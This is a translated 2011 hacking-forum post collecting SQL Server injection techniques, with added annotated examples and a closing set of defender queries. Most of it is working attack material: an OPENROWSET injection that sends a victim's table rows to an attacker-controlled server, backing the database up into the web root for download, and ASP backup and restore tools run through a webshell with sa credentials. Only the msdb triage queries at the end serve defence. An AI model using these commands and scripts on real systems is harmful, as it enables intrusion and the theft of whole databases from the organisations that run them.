A fairly complete collection of SQL-injection-related commands
Author:  Source:  Published: 2011-6-15 15:18:23  Hits:
Reverse-connect to your own database machine. First create a table locally with the same structure as the target's table, using nvarchar for every column. Then connect to the target's SQL Server with the 海洋 ASP webshell and run the following in its query analyser:
insert into OPENROWSET('sqloledb','server=<IP of your DB server>;uid=user;pwd=pass;database=dbname;','select * from <the table you created>') select * from <target table>--
If there is too much data, check whether the target table has an auto-numbered (identity) column and pull it in ranges: select * from <table> where id>100
and so on.
If the database sits on the same host as the web server, just back the database up (.bak) into the web directory and download it. The catch is that the database must not be too large: over 2 GB and SQL Server times out.
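The three steps above (receiving table, OPENROWSET push, backup into the web root) written out as an added example; this is not code from the original post. Every name in it is a placeholder: the target table dbo.users (id INT IDENTITY, username, pwd), the attacker-controlled SQL Server at 203.0.113.10 with login exfil and database loot, and the IIS web root C:\inetpub\wwwroot. Step 2b generalises the post's `where id>100` into a bounded range so each request stays small.

```sql
-- Added example (not from the original post). Placeholders: target table dbo.users
-- (id INT IDENTITY, username NVARCHAR(64), pwd NVARCHAR(128)); attacker-controlled
-- SQL Server at 203.0.113.10, login exfil / exfilpass, database loot.

-- 1. On the attacker's SQL Server: the receiving table. Same column order as the
--    target's table, every column nvarchar so no value fails an implicit conversion.
CREATE TABLE dbo.users_copy (
    id       NVARCHAR(32),
    username NVARCHAR(256),
    pwd      NVARCHAR(256)
);

-- 2. On the target (through the injection point or a webshell's SQL client):
--    OPENROWSET used as the INSERT target makes the victim's SQL Server open an
--    outbound TCP/1433 connection to 203.0.113.10 and push the rows into users_copy.
--    The trailing -- comments out whatever the injected query would otherwise append.
INSERT INTO OPENROWSET('SQLOLEDB',
    'server=203.0.113.10;uid=exfil;pwd=exfilpass;database=loot;',
    'SELECT * FROM dbo.users_copy')
SELECT id, username, pwd FROM dbo.users; --

-- 2b. Large table: walk it in ranges on the identity column so one statement stays
--     under the web tier's request timeout; repeat with the next range (201-300, ...).
INSERT INTO OPENROWSET('SQLOLEDB',
    'server=203.0.113.10;uid=exfil;pwd=exfilpass;database=loot;',
    'SELECT * FROM dbo.users_copy')
SELECT id, username, pwd FROM dbo.users WHERE id > 100 AND id <= 200; --

-- 3. Database and web server on the same host: write a native backup under the
--    web root and fetch it over HTTP instead (C:\inetpub\wwwroot is a placeholder).
BACKUP DATABASE target_db TO DISK = 'C:\inetpub\wwwroot\site.bak' WITH INIT; --
```

Two caveats a practitioner will hit. Step 2 needs the victim to be allowed outbound TCP/1433 to the attacker's host, so a firewall that only permits inbound SQL traffic stops it cold. And on SQL Server 2005 and later, ad hoc OPENROWSET connections are refused unless the 'Ad Hoc Distributed Queries' option has been enabled; SQL Server 2000, the common target when this was written, allowed them by default.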
With sa privileges, the following two ASP programs can be used to back up the database:
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server database backup and restore</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
Operation:<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>Backup</label>
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>Restore</label>
<br>Database name:<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>File path:<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(path to back up to or restore from; backing up as an .exe is only to make the download easier, heh..)<br>
<input type="submit" value="OK">
</form>
<%
On Error Resume Next 'without this, the err.number checks below never see a SQLDMO failure
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'SQL Server host
sqlname = "sa" 'login
sqlpassword = "database password" 'password
sqlLoginTimeout = 15 'login timeout in seconds
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename) '"$1" in the path stands for the database name
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Files=bak_file 'back up straight to a file; no named backup device is involved
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>Backup succeeded!</font>"
end if
srv.DisConnect
elseif act = "restore" then
'Restore only while nobody is using the database!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
rest.SQLRestore srv
if err.number>0 then 'check only after SQLRestore has actually run
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>Restore succeeded!</font>"
end if
srv.DisConnect
else
Response.write "<font color=red>No operation selected</font>"
end if
end if
%>
</BODY>
</HTML>
sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飛揚(yáng) ASP MSSQL database backup tool V1.0--QQ:79998575</title>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}
TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}
.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}
.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}
.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}
input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}
textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}
.liuyes { background-color: #CCCCFF;}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}
tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}
td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}
.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}
.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}
</style>
</head>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飛揚(yáng) ASP MSSQL database backup tool V1.0 </font></td>
</tr>
<tr>
<td>Operation:
<input type="radio" name="act" id="act_backup" value="backup" />
<label for=act_backup>Backup</label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>Restore</label></td>
</tr>
<tr>
<td><label>SQL Server:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>Login:
<input name="sqlname" type="text" value="sa" />
Password:
<input type="password" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>Database name:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>File path:
<input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(path to back up to or restore from; the default is liuyes.bak in the web root)</td>
</tr>
<tr>
<td><% Response.write "Absolute path of this file:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="OK" />
<input name="Submit" type="reset" class="liuyes" size="10" value="Reset" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>Message:<%
if request("action")="" then
response.write "<font color=#ff0000>No need for me to say more, is there!</font>"
end if
' The listing on the page stops here: the branch handling action=backupdatabase
' (connecting with the submitted sqlserver/sqlname/sqlpassword and issuing the
' SQLDMO backup or restore, as sqlbackup1.asp does) was not included.
%></td>
</tr>
</table>
</body>
</html>
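Both scripts above drive SQL-DMO, and SQLDMO's SQLBackup and SQLRestore are just ordinary BACKUP DATABASE / RESTORE DATABASE statements, so every run leaves a row in msdb. What follows is an added defender-side example, not code from the original post or from either script's author: the queries an incident responder would run on a suspected server to find backups dropped into the web root or disguised with a harmless extension, and to see whether the OPENROWSET trick from the top of the post is even enabled. The 'wwwroot' path pattern assumes a default IIS layout; adjust it to the real one.

```sql
-- Added defender-side checks (not from the original post). Assumes the IIS web root
-- lives under a path containing 'wwwroot'; adjust the LIKE patterns to the real layout.

-- 1. Backups written somewhere a web server can serve, or hidden behind a non-.bak
--    extension (the scripts above default to c:\1.exe and <webroot>\liuyes.bak).
SELECT bs.database_name,
       bs.backup_start_date,
       bs.user_name,             -- login that ran the backup (sa for the scripts above)
       bmf.physical_device_name  -- where the file landed
FROM msdb.dbo.backupset AS bs
JOIN msdb.dbo.backupmediafamily AS bmf
  ON bmf.media_set_id = bs.media_set_id
WHERE bmf.physical_device_name LIKE '%wwwroot%'
   OR bmf.physical_device_name LIKE '%.exe'
   OR bmf.physical_device_name LIKE '%.asp%'
   OR bmf.physical_device_name LIKE '%.txt'
ORDER BY bs.backup_start_date DESC;

-- 2. Restores over an existing database (rest.ReplaceDatabase=True) are logged too.
SELECT destination_database_name,
       restore_date,
       user_name,
       [replace]                 -- 1 when the restore overwrote an existing database
FROM msdb.dbo.restorehistory
ORDER BY restore_date DESC;

-- 3. Can this instance be used for the OPENROWSET reverse-connect at all?
--    SQL Server 2005 and later refuse ad hoc OPENROWSET connections unless this
--    option is on (value_in_use = 1); SQL Server 2000 allowed them by default and
--    has no sys.configurations view.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'Ad Hoc Distributed Queries';
```

Query 1 is the useful one during triage: a backup whose physical_device_name points under the web root, or ends in .exe, is not something a DBA's maintenance plan writes, and the user_name column tells you which login the attacker had. If the web application itself connects as sa, as both scripts assume, that column will not distinguish the attacker from the application, which is the argument for not running the application as sa in the first place.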